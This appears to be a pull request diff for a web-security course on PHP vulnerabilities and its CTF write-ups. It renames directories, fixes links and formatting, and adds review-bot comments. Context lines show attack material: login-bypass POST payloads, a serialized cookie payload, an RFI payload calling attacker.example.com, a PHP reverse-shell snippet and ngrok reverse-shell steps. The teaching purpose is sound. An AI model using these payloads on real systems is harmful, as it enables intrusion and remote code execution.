modified exotic attacks to open education hub standard #84

Open
wants to merge 1 commit into
base: main
Expand Up @@ -28,4 +28,4 @@ A possible payload in POST data is:

`username[]="8"&password[]=8&submit=Login`

Exploit in `../sol/solution.sh`.
Exploit in `../solution/solution.sh`.
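Review bot: the new relative path `../solution/solution.sh` only resolves if the `sol/` directory was actually renamed to `solution/` in this same commit; the adjacent "File renamed without changes." entry suggests it was, but the rename itself is not visible in this hunk, so please confirm the directory name matches exactly (case included) before merging.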
File renamed without changes.
Expand Up @@ -21,4 +21,4 @@ The final payload in POST data is:

`username=QNKCDZO&password=&submit=Login`

Exploit in `../sol/solution.sh`.
Exploit in `../solution/solution.sh`.
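Review bot: same path fix as in the previous file; a repo-wide search for `../sol/` would confirm that no stale reference to the old directory name survives the rename.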
File renamed without changes.
Expand Up @@ -7,6 +7,7 @@ LFI + PHP Object Injection / PHP Insecure Object Deserialization + RCE
## Exploit

The exploit involves opening a reverse shell. You'll need to:

1. Create an account on [ngrok](https://ngrok.com/) (also confirm your email address).
2. Install `ngrok` on you machine.
3. Forward your 1234 port using: `ngrok tcp 1234`. A ngrok host and IP will be forwarded to your local port.
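Review bot: while adding the blank line before the numbered list, the unchanged context lines still carry two small typos worth fixing in the same commit: `on you machine` should read `on your machine`, and `A ngrok host` should read `An ngrok host`.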
Expand All @@ -26,8 +27,9 @@ You guessed it, the handy one is **Unserialize**.

After inspecting the source code in the archive, you see what the serialized input object should look like.
It has to be a PHP class with two attributes:
* `$condition` - boolean with the value `true`
* `$prop` - a string you can use for remote code execution on the server

* `$condition` - boolean with the value `true`
* `$prop` - a string you can use for remote code execution on the server

Since the actual output of the command is not shown, only the unserialized string, you should try to create a reverse shell.

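Review bot: the blank line before the bullet list is the right fix (CommonMark does not start a list directly after a paragraph line), and the two bullets are re-added verbatim, so there is no wording drift to check in this hunk.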
Expand Down Expand Up @@ -91,4 +93,4 @@ Now access `/backdoor.php` in the browser and you should have a shell in the `nc

Find the flag file and perform a `cat` on it; it should be in `home/ctf/`: `cat /home/ctf/flag.txt`.

Exploit in `../sol/solution.sh`.
Exploit in `../solution/solution.sh`.
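Review bot: the unchanged context line `it should be in \`home/ctf/\`` is missing the leading slash while the command on the same line uses `/home/ctf/flag.txt`; since this file is already being touched, make it `/home/ctf/` so the two agree.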
File renamed without changes.
File renamed without changes.
Expand Up @@ -46,4 +46,4 @@ Make the request again.
You should have a shell now in the `nc` terminal.
Find the flag file and perform a `cat` on it; it should be in `home/ctf/`: `cat /home/ctf/flag.txt`.

Exploit in `../sol/solution.sh`.
Exploit in `../solution/solution.sh`.
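Review bot: same inconsistency as in the previous file: `home/ctf/` in the context line lacks the leading slash that the `cat /home/ctf/flag.txt` command uses; worth correcting in the same commit.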
File renamed without changes.
Expand Up @@ -23,4 +23,4 @@ Now navigate to: `/uploads/5c7dce216dceb5c1a61108e9db9fa835.php`.

The flag should be in the page source (inspect it).

Exploit in `../sol/solution.sh`.
Exploit in `../solution/solution.sh`.
File renamed without changes.
Expand Up @@ -33,4 +33,4 @@ Haystack: `m`

Output: the flag

Exploit in `../sol/solution.sh`.
Exploit in `../solution/solution.sh`.
File renamed without changes.
File renamed without changes.
Expand Up @@ -30,4 +30,4 @@ So we have to make a request with the result as cookie:

`Cookie: todos=760463360e4919ca238d1566fc26661fa%3A1%3A%7Bi%3A0%3BO%3A16%3A%22GPLSourceBloater%22%3A1%3A%7Bs%3A6%3A%22source%22%3Bs%3A8%3A%22flag.php%22%3B%7D%7D`

Exploit in `../sol/solution.sh`.
Exploit in `../solution/solution.sh`.
File renamed without changes.
File renamed without changes.
File renamed without changes.
Expand Up @@ -13,14 +13,14 @@ The most common server-side language on the web today is still **PHP**.
There are lots of legacy websites which used this language to begin with, and a complete refactor is just not worth it.
Today, even if there are better options for the server-side choice, PHP is still pretty popular.

![Server Side Languages Popularity](./assets/language-stats.png)
![Server Side Languages Popularity](./media/language-stats.png)

Source [here](https://w3techs.com/technologies/overview/programming_language).

There are also lots of different PHP versions, each with its own vulnerabilities.
A small insight into the distribution of versions across the web is:

![PHP Versions Popularity](./assets/version-stats.png)
![PHP Versions Popularity](./media/version-stats.png)

Source [here](https://w3techs.com/technologies/details/pl-php).

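Review bot: the image links now point at `./media/`, but none of the visible "File renamed without changes." entries can be identified as the PNGs from this hunk alone, so please confirm `language-stats.png` and `version-stats.png` were moved into `media/` in the same commit; a relative image link to a missing file renders as a broken image with no build error to catch it.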
Expand All @@ -39,7 +39,7 @@ But this kind of flexibility sometimes causes unexpected errors in the program f

In this section we will discuss **PHP type juggling** and how this can lead to authentication bypass vulnerabilities.

![Type Juggling examples](./assets/type-juggling.png)
![Type Juggling examples](./media/type-juggling.png)

## How PHP compares values

Expand Down Expand Up @@ -88,7 +88,7 @@ The following tables showcase the difference between the two comparison modes:

| Loose comparison | Strict comparison |
| ------------------- | ------------------- |
| ![Loose comparison](./assets/loose-comparison.png) | ![Strict comparison](./assets/strict-comparison.png) |
| ![Loose comparison](./media/loose-comparison.png) | ![Strict comparison](./media/strict-comparison.png) |

However, loose type comparison behavior like the one presented above is pretty common in PHP and many built-in functions work in the same way.
You can probably already see how this can be very problematic, but how exactly can hackers exploit this behavior?
Expand Down Expand Up @@ -393,7 +393,7 @@ Potential web security consequences of a successful **RFI** attack range from **
**Remote file inclusion** attacks usually occur when an application receives a path to a file as input for a web page and does not properly sanitize it.
This allows an external URL to be supplied to the include function.

![RFI Attack](./assets/what-is-rfi-attack.png)
![RFI Attack](./media/what-is-rfi-attack.png)

The above definitions are very similar, so what is the exact difference between the two of them and how does an exploit affect the web application in each case?

Expand Down Expand Up @@ -446,14 +446,15 @@ Payload: `http://example.com/?file=http://attacker.example.com/evil.php`
This means that getting a reverse shell on a web server will grant you only the rights of the user running the website.
In order to get root access on the machine, further **privilege escalation** methods should be employed, which you will learn about in a future session.

### Example of a simple reverse shell in PHP:
### Example of a simple reverse shell in PHP

```php
<?php
$sock = fsockopen("127.0.0.1",1234);
$proc = proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock), $pipes);
?>
```

# Python Insecure Deserialization / `pickle` module

We have looked at so many PHP vulnerabilities in this session, but you shouldn't be left with the impression that PHP is the only vulnerable language.
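Review bot: dropping the trailing colon from the `###` heading is consistent with the other headings in the document (`## Exploit`, `## How PHP compares values`), and the blank line added after the closing fence gives the following `# Python Insecure Deserialization` heading the separation markdownlint expects; no content changes in this hunk.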
Expand Down Expand Up @@ -507,6 +508,7 @@ Reading a bit further down in the docs we can see that implementing `__reduce__`
When a tuple is returned, it must be between two and six items long.
Optional items can either be omitted, or `None` can be provided as their value.
The semantics of each item are in order:
>
> * A callable object that will be called to create the initial version of the object.
> * A tuple of arguments for the callable object. An empty tuple must be given if the callable does not accept any argument. [...]

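Review bot: the added `>` line keeps the quoted docs passage as a single blockquote, but the three context lines just above it (`When a tuple is returned, ...` through `The semantics of each item are in order:`) are not prefixed with `>` even though they read as part of the same quoted `__reduce__` documentation; check whether those lines should be quoted too so the citation boundary is unambiguous.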
Expand Down Expand Up @@ -550,18 +552,18 @@ In conclusion, the code should be properly tested before being put in production

# Further Reading

* https://owasp.org/www-pdf-archive/PHPMagicTricks-TypeJuggling.pdf
* https://www.netsparker.com/blog/web-security/php-type-juggling-vulnerabilities/
* https://foxglovesecurity.com/2017/02/07/type-juggling-and-php-object-injection-and-sqli-oh-my/
* https://hydrasky.com/network-security/php-string-comparison-vulnerabilities/
* https://medium.com/swlh/php-type-juggling-vulnerabilities-3e28c4ed5c09
* https://nitesculucian.github.io/2018/10/05/php-object-injection-cheat-sheet/
* https://www.imperva.com/learn/application-security/rfi-remote-file-inclusion/
* https://www.acunetix.com/blog/articles/remote-file-inclusion-rfi/
* https://www.acunetix.com/blog/articles/local-file-inclusion-lfi/
* https://bitquark.co.uk/blog/2013/07/23/the_unexpected_dangers_of_preg_replace
* https://www.whitehatsec.com/blog/magic-hashes/
* https://davidhamann.de/2020/04/05/exploiting-python-pickle/
* <https://owasp.org/www-pdf-archive/PHPMagicTricks-TypeJuggling.pdf>
* <https://www.netsparker.com/blog/web-security/php-type-juggling-vulnerabilities/>
* <https://foxglovesecurity.com/2017/02/07/type-juggling-and-php-object-injection-and-sqli-oh-my/>
* <https://hydrasky.com/network-security/php-string-comparison-vulnerabilities/>
* <https://medium.com/swlh/php-type-juggling-vulnerabilities-3e28c4ed5c09>
* <https://nitesculucian.github.io/2018/10/05/php-object-injection-cheat-sheet/>
* <https://www.imperva.com/learn/application-security/rfi-remote-file-inclusion/>
* <https://www.acunetix.com/blog/articles/remote-file-inclusion-rfi/>
* <https://www.acunetix.com/blog/articles/local-file-inclusion-lfi/>
* <https://bitquark.co.uk/blog/2013/07/23/the_unexpected_dangers_of_preg_replace>
* <https://www.whitehatsec.com/blog/magic-hashes/>
* <https://davidhamann.de/2020/04/05/exploiting-python-pickle/>

# Activities

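Review bot: wrapping the bare URLs in `<...>` resolves the autolink lint warning, but the list remains a column of raw URLs; descriptive link text (for example `[PHP Magic Tricks: Type Juggling (OWASP)](https://owasp.org/www-pdf-archive/PHPMagicTricks-TypeJuggling.pdf)`) would be more readable and keeps the reference meaningful if a link later rots.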